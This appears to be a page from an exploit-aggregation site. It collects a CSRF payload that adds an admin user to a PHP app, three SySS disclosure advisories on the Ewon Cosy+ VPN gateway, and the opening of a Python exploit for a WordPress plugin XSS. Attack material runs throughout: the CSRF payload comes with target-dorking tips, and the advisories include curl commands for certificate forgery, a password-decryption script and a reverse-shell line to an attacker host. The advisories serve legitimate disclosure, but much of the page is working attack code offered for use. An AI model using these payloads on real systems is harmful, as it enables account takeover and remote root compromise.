Latest exploits :: CodePwn

<pre><code>============================================================================================================================================= | # Title : Accounting Journal Management System 1.0 CSRF Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) | | # Vendor : https://www.sourcecodester.com/sites/default/files/download/oretnom23/hotel-management-system-using-php.zip | ============================================================================================================================================= poc : [+] Dorking İn Google Or Other Search Enggine. [+] Line 6 : Set your target url [+] Line 15 + 19 : Set user & pass [+] save payload as poc.html [+] payload : <!DOCTYPE html> <html> <body> <script> function submitRequest() { var xhr = new XMLHttpRequest(); xhr.open("POST", "http://127.0.0.1/ajms/classes/Users.php?f=save", true); xhr.setRequestHeader("Accept", "*\/*"); xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5"); xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------"); xhr.withCredentials = true; var body = "-----------------------------\r\n" + "Content-Disposition: form-data; name=\"username\"\r\n" + "\r\n" + "indoushka\r\n" + "-----------------------------\r\n" + "Content-Disposition: form-data; name=\"password\"\r\n" + "\r\n" + "Hacked\r\n" + "-----------------------------\r\n" + "Content-Disposition: form-data; name=\"type\"\r\n" + "\r\n" + "1\r\n" + "-------------------------------\r\n"; var aBody = new Uint8Array(body.length); for (var i = 0; i < aBody.length; i++) aBody[i] = body.charCodeAt(i); xhr.send(new Blob([aBody])); } </script> <form action="#"> <input type="button" value="Submit request" onclick="submitRequest();" /> </form> </body> </html> Greetings to :============================================================ jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr | ========================================================================== </code></pre>

<pre><code>-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Advisory ID: SYSS-2024-043 Product: Ewon Cosy+ / Talk2M Remote Access Solution Manufacturer: HMS Industrial Networks AB Affected Version(s): N.A. Tested Version(s): N.A. Vulnerability Type: Improper Authentication (CWE-287) Risk Level: High Solution Status: Fixed Manufacturer Notification: 2024-04-17 Solution Date: 2024-04-18 Public Disclosure: 2024-08-11 CVE Reference: CVE-2024-33897 Author of Advisory: Moritz Abrell, SySS GmbH ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: The Ewon Cosy+ is a VPN gateway used for remote access and maintenance in industrial environments. The manufacturer describes the product as follows (see [1]): "The Ewon Cosy+ gateway establishes a secure VPN connection between the machine (PLC, HMI, or other devices) and the remote engineer. The connection happens through Talk2m, a highly secured industrial cloud service. The Ewon Cosy+ makes industrial remote access easy and secure like never before!" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: During account assignment in the Talk2M platform, a Cosy+ device generates and sends a certificate signing request (CSR) to the back end. This CSR is then signed by the manufacturer and used for OpenVPN authentication by the device afterward. Since the common name (CN) of the certificate is specified by the device and used in order to assign the OpenVPN session to the corresponding Talk2M account, an attacker with root access to a Cosy+ device is able to manipulate the CSR and get correctly signed certificates for foreign devices. Using these certificates for OpenVPN authentication results in hijacking the VPN session and allows for further attacks, e.g.: - - Impacting the accessibility of the original device - - Attacking the Talk2M-connected user device via the VPN connection - - Eavesdropping and manipulating the network communication of connected users ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): Note: Since the X.509 client certificate of a Cosy+, which is used for authentication against the Talk2M API, is handled by the hardware security module (HSM), root access to a Cosy+ device is required. 1. Exporting the OpenSSL engine to use the hardware security module: $ export OPENSSL_CONF=/etc/ssl/se050_openssl.cnf $ export EX_SSS_BOOT_SSS_PORT=/dev/i2c-0 2. Sending a self-created CSR to the Talk2M API: $ curl --path-as-is -i -s -k -X $'POST' \ -H $'Host: eu.device.talk2m.com' -H $'Accept: application/json' \ -H $'Content-Type: application/json' -H $'Ewon-Serial: 2403-0999-25' \ -H $'Device-State: AccountLinked' -H $'Content-Length: 768' \ --data-binary $'{\x0a\x09\"csr\": \x09\"-----BEGIN CERTIFICATE REQUEST-----\\nMIIB6zCCAUwCAQAwgaY xCzAJBgNVBAYTAkJFMRcwFQYDVQQIEw5CcmFiYW50IFdh\\nbGxvbjERMA8GA1U EBxMITml2ZWxsZXMxIzAhBgNVBAoTGkhNUyBJbmR1c3RyaWFs\\nIE5ldHdvcmt zIFNBMRAwDgYDVQQLEwdFd29uIEJVMRYwFAYDVQQDEw1EMjMwNy0w\\nMTAxLTI 1MRwwGgYJKoZIhvcNAQkBFg1pbmZvQGV3b24uYml6MIGbMBAGByqGSM49\\nAgE GBSuBBAAjA4GGAAQBaUGPo1FIjOOqyd1M47M2fcLQ2MN3aj7wI8pBYmopdSEY\\ nKszktBPre3AZ74E4326+vUej6nBG/17SWNb+VZPEyXYBAvEyyvsXfy/UlnB6NX aj\\n6rrmy2pqP5bKN/1yR3reqlA6+9rdYzcH3ESJvp9hTkZnV4qbdNjTtqSfZO 4zu1Zn\\nE+CgADAKBggqhkjOPQQDAgOBjAAwgYgCQgDVbJN5MJJZnkRRvNwwXu 6GrvILBN6H\\nxTwR3inwMxLf+a/o+SFiqq5Pvsm2UXebVSD3osopdnJ8cxzTzi PopsLiXAJCAa5K\\n+0T0H8VAvBzKTQkpiHHzW9JkDvIDaJA4WtYzA+KT7jo4kW vQIr7rBBOlILoofQzv\\nypCqHaugjHhdeuJecIiq\\n-----END CERTIFICAT E REQUEST-----\\n\"\x0a}' \ $'https://eu.device.talk2m.com/certificates/csr' \ --cert /tmp/birth_key_crt.pem --key /tmp/birth_key_ref.pem 3. Requesting the signed certificate: $ curl -i -k -H $'Device-State: AccountLinked' \ https://device.talk2m.com/certificates/deviceCertificate \ --cert birth_key_crt.pem --key birth_key_ref.pem 4. Talk2M response: HTTP/1.1 200 date: Tue, 16 Apr 2024 13:09:57 GMT server: Apache ewon-server-time: 1713272998 device-state: VpnProvisioned content-type: application/json transfer-encoding: chunked {"certificate":"-----BEGIN CERTIFICATE-----\nMIIDTjCCAjagAwIBA[...] KsxyR8w==\n-----END CERTIFICATE-----"} 5. This signed certificate and the used key can be used for OpenVPN authentication. The CN will be used to assign the session to the corresponding Talk2M account. This also overwrites a potential current VPN session of the original device: $ openvpn --config attacker.ovpn Attempting to establish TCP connection with [AF_INET]51.195.79.69:443 TCP connection established with [AF_INET]51.195.79.69:443 TCPv4_CLIENT link remote: [AF_INET]51.195.79.69:443 VERIFY OK: depth=1, C=BE, ST=Brabant Wallon, L=Nivelles, O=eWON sa, OU=Talk2M, CN=Talk2M Certification Authority, emailAddress=itmanager@talk2m.com VERIFY KU OK Validating certificate extended key usage ++ Certificate has EKU (str) TLS Web Server Authentication, expects TLS Web Server Authentication VERIFY EKU OK VERIFY OK: depth=0, C=BE, ST=Brabant Wallon, L=Nivelles, O=HMS Industrial Networks SA, OU=Talk2M, CN=server-device, emailAddress=info@ewon.biz Control Channel: TLSv1.2, cipher TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, peer certificate: 2048 bit RSA, signature: RSA-SHA1 [server-device] Peer Connection Initiated with [AF_INET]51.195.79.69:443 TUN/TAP device tap0 opened net_addr_ll_set: lladdr 00:03:27:d8:68:84 for tap0 TUN/TAP link layer address set to 00:03:27:d8:68:84 net_iface_mtu_set: mtu 1500 for tap0 net_iface_up: set tap0 up net_addr_v4_add: 10.37.211.214/16 dev tap0 Data Channel: cipher 'AES-256-GCM', peer-id: 0, compression: 'lzo' Timers: ping 10, ping-exit 40 Initialization Sequence Completed ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: The vulnerability was fixed in the back end by HMS on April 18, 2024. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2024-04-09: Potential vulnerability discovered 2024-04-16: Call with the manufacturer and requested a Talk2M account with an assigned device to verify the potential vulnerability 2024-04-16: Manufacturer provided a Talk2M account with an assigned device 2024-04-16: Vulnerability confirmed 2024-04-16: Short update about the state sent to the manufacturer 2024-04-16: Security advisory inculding technical details provided to the manufacturer 2024-04-18: Vulnerability fixed by the manufacturer 2024-04-30: CVE ID CVE-2024-33897[5] assigned by the manufacturer 2024-07-12: Manufacturer asked for reviewing the blog post draft 2024-07-12: Confirmed reviewing the blog post is possible and asking for the sending of details 2024-07-17: Blog post provided to HMS 2024-07-23: Inquiry about the status 2024-07-23: Manufacturer reviewed the blog post 2024-07-24: Manufacturer also asked for an appointment to discuss the blog post 2024-07-29: Discussion with HMS about the blog post and final publication actions 2024-08-11: Vulnerability disclosed at DEF CON[7] 2024-08-11: Blog post published[6] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: [1] Ewon Cosy+ product website https://www.hms-networks.com/p/ec71330-00ma-ewon-cosy-ethernet [2] SySS Security Advisory SYSS-2024-043 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-043.txt [3] SySS Responsible Disclosure Policy https://www.syss.de/en/responsible-disclosure-policy [4] Manufacturer note https://hmsnetworks.blob.core.windows.net/nlw/docs/default-source/products/cybersecurity/security-advisory/hms-security-advisory-2024-07-29-001--ewon-several-cosy--vulnerabilities.pdf [5] CVE-2024-33897 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-33897 [6] Blog post https://blog.syss.com/posts/hacking-a-secure-industrial-remote-access-gateway/ [7] DEF CON talk https://defcon.org/html/defcon-32/dc-32-speakers.html#54521 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Credits: This security vulnerability was found by Moritz Abrell of SySS GmbH. E-Mail:moritz.abrell@syss.de Public Key:https://www.syss.de/fileadmin/dokumente/PGPKeys/Moritz_Abrell.asc Key Fingerprint: 2927 7EB6 1A20 0679 79E9 87E6 AE0C 9BF8 F134 8B53 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS website. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright: Creative Commons - Attribution (by) - Version 3.0 URL:http://creativecommons.org/licenses/by/3.0/deed.en -----BEGIN PGP SIGNATURE----- iQIzBAEBCgAdFiEEKSd+thogBnl56Yfmrgyb+PE0i1MFAmay47wACgkQrgyb+PE0 i1O5RQ/9HM9YIPRLVqGSRNPYW45F9e1wj9uHTvt78XjRng5lbRPpgWAO1G6UVQvS ebugxzjAtGrdMxx8X1NHd9vbshyAHj/q33Y0fkQ5TB2hnSMkn2nbXTEZKIIS6wK0 XnJhB31iVnkgMeNFQ0SwSutBnnxJ7mvQ6vUBG210DSHjpQtu8rWuCyrf3BcSCJ/I nT79b7TJOxOMD1y5VAeVP6Pehh+IlJgvSItXZyOjs4wgt/+z+wVoKnYdqSAHpovI /rjVbtp7cvIhQInghnDoRWfXce34bk07geOB4VGg7bhxGCeWbJZq/Dxrag5jJb9l 0zx2K4M8ZTwFcrtAliFgyzrIgvjfOk9HCZasSMl20znj4+3QaAWpfn2oMmCQCaLg 6hBqAQ+s66Cv8Br24WKdlnj3nrsn+SAX2TKDxajt+WiDkXKvsLPs8XCmzVN8jViK nN/dJ3chba4yhqmpft1wRXG71VvBdbv3pkLp7usKszUrul8M802JzF2aGTUsiKgQ QSxpNhSP4aC2jqjt1OpX7W6NKD1nIhg0VrduxlwlAcQ2uffbh8xtak1MgZry0/yP 6j9a15DOTJshMeud8R3Bkfjms/0Jzm43uyjIeRGNP79UyohsTX4jOJAsUYr0efUZ /55N3HiCD94jYoee5E3sF1vWlrhVDzkWJ7Q8u/W4osSIwMNikTc= =JS3w -----END PGP SIGNATURE----- </code></pre>

<pre><code>-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Advisory ID: SYSS-2024-032 Product: Ewon Cosy+ Manufacturer: HMS Industrial Networks AB Affected Version(s): Firmware Versions: < 21.2s10 and < 22.1s3 Tested Version(s): Firmware Version: 21.2s7 Vulnerability Type: Use of Hard-coded Cryptographic Key (CWE-321) Risk Level: Medium Solution Status: Fixed Manufacturer Notification: 2024-04-10 Solution Date: 2024-07-18 Public Disclosure: 2024-08-11 CVE Reference: CVE-2024-33895 Author of Advisory: Moritz Abrell, SySS GmbH ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: The Ewon Cosy+ is a VPN gateway used for remote access and maintenance in industrial environments. The manufacturer describes the product as follows (see [1]): "The Ewon Cosy+ gateway establishes a secure VPN connection between the machine (PLC, HMI, or other devices) and the remote engineer. The connection happens through Talk2m, a highly secured industrial cloud service. The Ewon Cosy+ makes industrial remote access easy and secure like never before!" Due to the use of a hardcoded cryptographic key, an attacker is able to decrypt encrypted data and retrieve sensitive information. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: The Ewon Cosy+ stores sensitive data such as passwords in an encrypted format. These values are included, e.g., in configuration backups. However, a symmetric encryption algorithm (AES-CBC-256) with hardcoded and static cryptographic keys is used. Thus, an attacker is able to decrypt that data and retrieve sensitive information. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): By analyzing the ELF executable "ewon" of an Ewon Cosy+ in a disassembler and decompiler, e.g. Ghidra, the encryption mechanism could be reversed and the hardcoded cryptographic key could be extracted. Used encryption algorithm: AES in CBC mode with a key length of 256 bit A simple Python script was developed to decrypt encrypted values: ******************** import base64 import sys from Crypto.Cipher import AES from binascii import unhexlify def pad(text): padding_length = AES.block_size - (len(text) % AES.block_size) padded_text = text + bytes([padding_length] * padding_length) return padded_text, padding_length encoded_text = sys.argv[1] key_hex = "6367b0 [...]" # redacted iv_hex = "28c9 [...]" # redacted key = unhexlify(key_hex) iv = unhexlify(iv_hex) decoded_text = base64.b64decode(encoded_text[4:]) padded_text, padding_length = pad(decoded_text) cipher = AES.new(key, AES.MODE_CBC, iv) decrypted_text = cipher.decrypt(padded_text) print("Plaintext: {}".format( decrypted_text[1:][:-padding_length-2].decode('utf-8') )) **************** $> python3 decrypt_ewon_pwd.py "#_5_YARU3GSgNcElltjyMMqWfZwb" Plaintext: adm:123 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: According to the manufacturer note[4], the vulnerability was fixed with the firmware versions 21.2s10 and 22.1s3. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2024-04-04: Vulnerability discovered 2024-04-10: Vulnerability reported to manufacturer 2024-04-11: Manufacturer acknowlegded the vulnerabilities and asked for a publication date for all findings 2024-04-12: Proposed dates for a discussion about publication 2024-04-19: Manufacturer sent a technical overview of planned remediation actions and details about the planned timeline 2024-04-30: CVE ID CVE-2024-33893[5] assigned by the manufacturer 2024-05-31: Manufacturer informed that the fix is in completion stage and asked if the blog post[6] can be reviewed by HMS 2024-06-04: Proposed dates to review the blog post draft 2024-06-21: Inquiry about the status 2024-06-21: Received an out-of-office auto reply 2024-07-01: Inquiry about the status 2024-07-04: Inquiry about the status 2024-07-12: Inquiry about the status and letting the manufacturer know that the vulnerability will be published within a talk at DEF CON[7] in August 2024-07-12: Manufacturer responded that the fix is planned by the end of July; manufacturer asked again for reviewing the blog post draft 2024-07-12: Again confirmed reviewing the blog post is possible and asking for the sending of details 2024-07-17: Blog post provided to HMS 2024-07-18: Fixed firmware versions 21.2s10 and 22.1s3 released by HMS 2024-07-23: Inquiry about the status 2024-07-23: Manufacturer reviewed the blog post and confirmed that a fix is provided 2024-07-29: Discussion with HMS about the blog post and final publication actions 2024-08-11: Vulnerability disclosed at DEF CON[7] 2024-08-11: Blog post published[6] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: [1] Ewon Cosy+ product website https://www.hms-networks.com/p/ec71330-00ma-ewon-cosy-ethernet [2] SySS Security Advisory SYSS-2024-032 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-032.txt [3] SySS Responsible Disclosure Policy https://www.syss.de/en/responsible-disclosure-policy [4] Manufacturer note https://hmsnetworks.blob.core.windows.net/nlw/docs/default-source/products/cybersecurity/security-advisory/hms-security-advisory-2024-07-29-001--ewon-several-cosy--vulnerabilities.pdf [5] CVE-2024-33895 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-33895 [6] Blog post https://blog.syss.com/posts/hacking-a-secure-industrial-remote-access-gateway/ [7] DEF CON talk https://defcon.org/html/defcon-32/dc-32-speakers.html#54521 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Credits: This security vulnerability was found by Moritz Abrell of SySS GmbH. E-Mail:moritz.abrell@syss.de Public Key:https://www.syss.de/fileadmin/dokumente/PGPKeys/Moritz_Abrell.asc Key Fingerprint: 2927 7EB6 1A20 0679 79E9 87E6 AE0C 9BF8 F134 8B53 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS website. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright: Creative Commons - Attribution (by) - Version 3.0 URL:http://creativecommons.org/licenses/by/3.0/deed.en -----BEGIN PGP SIGNATURE----- iQIzBAEBCgAdFiEEKSd+thogBnl56Yfmrgyb+PE0i1MFAmay420ACgkQrgyb+PE0 i1NNyw/9GzNMWrKeghrwqgcJ01f8QJGo1L3ObWscyiMXxqne6Zo8VyIefvGY97hb fZisL4BrzmK+NioLeP3SzM879yGbzU5dca7g5Cqf0qJh9mdU/s6tkgdK+Duz3QdZ 9XPV+ovSDGSDk953fVhHrKUdsns9hMnRIoMkfPxZUm+KWXRIwRguNxl2/q1xxgjt 2kqTldwgwgekKXXp+Uwt5Z8LUG0dU7pHHb3OCizJ81tOCHjwuJA3aUmyBachl4Vc Nw7GwByxoKLTTEfj2CWtkfC4u9UXHUQJBDl51+qRPIVkG2g0jTSQ2AEIubtmi7IA jA/8PK5QONh0GHptj2LzeTqlcEX7834uIE0gHrR5pkFJvgUWoNueEZ9FIHRNZPLX 9Lhu52uiKogX5BVYeRIkbHAxmgf/wojQ4AXE9BMvOgm0HSzjgIaVZ+cqNkMP1ey0 uDXPllHkWtA1IBeffhiVrfc11fLJJczkpN3hRevoa4D6hlNvOYrVUAY869vrJkA2 LHvFwLf1JDQaGiPCkglCcipjtXw+hqGE+zEYOWobXH4cIwdnPUG+VaAks9GcNEdN o6QVfnLTveo8e1u11z8ftguYthMbhOJxVWPBWJv6XhiCXEw8Gh/HonR6LfGQyRTe Fk+qtF1Mih2ZNKnW+XmHHCjtXGgiarfjExVFnhXHbrE8sOHv90I= =/d8q -----END PGP SIGNATURE----- </code></pre>

<pre><code>-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Advisory ID: SYSS-2024-018 Product: Ewon Cosy+ Manufacturer: HMS Industrial Networks AB Affected Version(s): Firmware Versions: < 21.2s10 and < 22.1s3 Tested Version(s): Firmware Version: 21.2s7 Vulnerability Type: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') (CWE-78) Risk Level: Medium Solution Status: Fixed Manufacturer Notification: 2024-03-27 Solution Date: 2024-07-18 Public Disclosure: 2024-08-11 CVE Reference: CVE-2024-33896 Author of Advisory: Moritz Abrell, SySS GmbH ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: The Ewon Cosy+ is a VPN gateway used for remote access and maintenance in industrial environments. The manufacturer describes the product as follows (see [1]): "The Ewon Cosy+ gateway establishes a secure VPN connection between the machine (PLC, HMI, or other devices) and the remote engineer. The connection happens through Talk2m, a highly secured industrial cloud service. The Ewon Cosy+ makes industrial remote access easy and secure like never before!" Due to improper neutralization of parameters read from a user-controlled configuration file, an authenticated attacker is able to inject and execute OS commands on the device. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: Authenticated attackers are able to upload a custom OpenVPN configuration. This configuration can contain the OpenVPN paramaters "--up" and "--down", which execute a specified script or executable. Since the process itself runs with the highest privileges (root), this allows the device to be completely compromised. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): 1. Generate a malicious OpenVPN configuration, e.g. instructing the device to create a reverse shell: client dev tun persist-tun proto tcp verb 5 mute 20 --up '/bin/sh -c "TF=$(mktemp -u);mkfifo $TF;telnet <attacker-ip> 5000 0<$TF | sh 1>$TF"' script-security 2 [...] 2. Start a listener on the attacker system: #> nc -lvp 5000 3. Upload the OpenVPN configuration via FTP to Cosy+. 4. Set the configuration paramater "VPNCfgFile" to "/usr/<vpnfile>". 5. Command is executed by Cosy+ and a reverse shell is initiated: nc -lvp 5000 istening on 0.0.0.0 5000 Connection received on 192.168.10.240 56806 id uid=0(root) gid=0(root) Note: The paramaters "--up" and "--down" need to be specified with two dashes since the values "up" and "down" are blocklisted on the device. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: According to the manufacturer note[4], the vulnerability was fixed with the firmware versions 21.2s10 and 22.1s3. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2024-03-26: Vulnerability discovered 2024-03-27: Vulnerability reported to manufacturer 2024-04-02: Inquiry about the status 2024-04-05: Manufacturer acknowlegded the vulnerability and started the analysis 2024-04-10: Two more vulnerabilities reported to the manufacturer (SYSS-2024-032 and SYSS-2024-033) 2024-04-11: Manufacturer acknowlegded the vulnerabilities and asked for a publication date for all findings 2024-04-12: Proposed dates for a discussion about publication 2024-04-15: Manufacturer sent a technical overview of planned remediation actions and details about the planned timeline 2024-04-15: Acknowlegded the remediation actions and asked the manufacturer for assigning a CVE ID 2024-04-30: CVE ID CVE-2024-33893[5] assigned by the manufacturer 2024-05-31: Manufacturer informed that the fix is in completion stage and asked if the blog post[6] can be reviewed by HMS 2024-06-04: Proposed dates to review the blog post draft 2024-06-21: Inquiry about the status 2024-06-21: Received an out-of-office auto reply 2024-07-01: Inquiry about the status 2024-07-04: Inquiry about the status 2024-07-12: Inquiry about the status and letting the manufacturer know that the vulnerability will be published within a talk at DEF CON[7] in August 2024-07-12: Manufacturer responded that the fix is planned by the end of July; manufacturer asked again for reviewing the blog post draft 2024-07-12: Again confirmed reviewing the blog post is possible and asking for the sending of details 2024-07-17: Blog post provided to HMS 2024-07-18: Fixed firmware versions 21.2s10 and 22.1s3 released by HMS 2024-07-23: Inquiry about the status 2024-07-23: Manufacturer reviewed the blog post and confirmed that a fix is provided 2024-07-29: Discussion with HMS about the blog post and final publication actions 2024-08-11: Vulnerability disclosed at DEF CON[7] 2024-08-11: Blog post published[6] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: [1] Ewon Cosy+ product website https://www.hms-networks.com/p/ec71330-00ma-ewon-cosy-ethernet [2] SySS Security Advisory SYSS-2024-018 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-018.txt [3] SySS Responsible Disclosure Policy https://www.syss.de/en/responsible-disclosure-policy [4] Manufacturer note https://hmsnetworks.blob.core.windows.net/nlw/docs/default-source/products/cybersecurity/security-advisory/hms-security-advisory-2024-07-29-001--ewon-several-cosy--vulnerabilities.pdf [5] CVE-2024-33896 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-33896 [6] Blog post https://blog.syss.com/posts/hacking-a-secure-industrial-remote-access-gateway/ [7] DEF CON talk https://defcon.org/html/defcon-32/dc-32-speakers.html#54521 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Credits: This security vulnerability was found by Moritz Abrell of SySS GmbH. E-Mail:moritz.abrell@syss.de Public Key:https://www.syss.de/fileadmin/dokumente/PGPKeys/Moritz_Abrell.asc Key Fingerprint: 2927 7EB6 1A20 0679 79E9 87E6 AE0C 9BF8 F134 8B53 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS website. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright: Creative Commons - Attribution (by) - Version 3.0 URL:http://creativecommons.org/licenses/by/3.0/deed.en -----BEGIN PGP SIGNATURE----- iQIzBAEBCgAdFiEEKSd+thogBnl56Yfmrgyb+PE0i1MFAmay41IACgkQrgyb+PE0 i1PIhQ//YBS1kK+SZAdwVcRCA1fPxKdfHVlHswwiQzyNWvTso35HsQm+cYOJd/zL gb9JJ0VqgohVezL9UVJhkbEVZbUNwAX13XpcjQimsxcVgx5jCus/4JUCH3+9vPCx lZyc+r5gzP7d3/a1sfGO739bkg8+itkp9jxhoZm5WOA+eg5Tz1j4tJN4uU79ikax 5HGubG3dxWq2EQPeEa4+eyKgQCRQTZzX+fiyqfSbRMQq7v4/GbMqH3FtI1CzxoZ3 HfsxQyPu3eUjQuykpMauwuwSgs11Yop9EBDzTuH1+OTmWUMy9exWmixcj/Sst+D9 6rHQkY+CozFy0ml4mQtp/CpN+Jj0op+BtSw1ILwLUL3aqXa96Ud+62ht9EDBQn/9 repfcR5hx9Lj9gfrn46ciW8S/Zy5PghYjOvxC75rsiU3ZHhp/aNF9uKgrdnbZGQe +CzompLF3pM8bCSwtUEauEfK+XArUg0oiN/d2Dl3LMqHJoK4Q1DkgD5v4POmtHsM HaSuE0i57fezwnELg5XNLKRpno57I4LEn1CWm4qebyJvAkodO32DGWAx+Qfh34tG R3Lj71uH1ffepHxMzPsW1WHHnOqjsXQIYw6yq6eJqHwS/ygR/OTVnGri5e4Xq/tN AZyo5WrR3iTmZMBhPAaDoLfclUG4IucGdJKGop9IKkeNTHXkuGk= =75wq -----END PGP SIGNATURE----- </code></pre>

<pre><code># Exploit Title: CVE-2024-7313 - Reflected XSS to Unauthorised Administrator Account Creation # Google Dork: inurl:"/wp-content/plugins/wp-simple-firewall/" (Cannot find version numbers from this DORK) # Date: 16/08/2024 # Exploit Author: Tim Lepp # Vendor Homepage: https://getshieldsecurity.com/ # Software Link: https://wordpress.org/plugins/wp-simple-firewall/advanced/ (Version <= 20.0.5) # Version: <20.0.6 # Tested on: Ubuntu # CVE : CVE-2024-7313 How It Works * The script first checks if the target WordPress installation is using a vulnerable version of the Shield Security plugin by examining the response from the wp-login.php page. * If the plugin version is vulnerable, it proceeds to generate a reflected XSS payload that, when executed, will create a new admin user with a hardcoded password as WordPress wont accept weak passwords without user intervention. * The payload is created to first use a GET request to dynamically find the WordPress nonce used for account creation, then use that nonce to submit a POST request to the user creation endpoint with the details of the new user given in the script. * The payload is then URL-encoded and displayed for use in the attack. * Once sent to an administrator of the site and the link is clicked, a new Administrator user will be created on the site with the details parsed by the script. This is all done in the background, with the phished administrator being redirected to the Shield Security dashboard with no clue of the exploit in the background. Reference https://research.cleantalk.org/cve-2024-7313/ Found also at https://github.com/Wayne-Ker/CVE-2024-7313/tree/main --- code --- import sys import urllib.parse import requests from bs4 import BeautifulSoup # Color codes for terminal output red = '\033[91m' green = '\033[92m' yellow = '\033[93m' blue = '\033[96m' purple = '\033[95m' reset = '\033[0m' # Banner and vulnerability information - Displayed at the start of the script def print_banner(): print(f"""{red} ############################################################################# # # # # # ______ _______ ____ ___ ____ _ _ _____ _____ _ _____ # # / ___\ \ / | ____| |___ \ / _ |___ \| || | |___ |___ // |___ / # # | | \ \ / /| _| _____ __) | | | |__) | || |_ _____ / / |_ \| | |_ \ # # | |___ \ V / | |__|_____/ __/| |_| / __/|__ _|_____/ / ___) | |___) | # # \____| \_/ |_____| |_____|\___|_____| |_| /_/ |____/|_|____/ # # # # Shield Security Plugin Vulnerability (CVE-2024-7313) # # Reflected XSS in WordPress Shield Security Plugin # # Versions Affected: < 20.0.6 # # Risk: High # # Discovered by: Wayne-Kerr # # 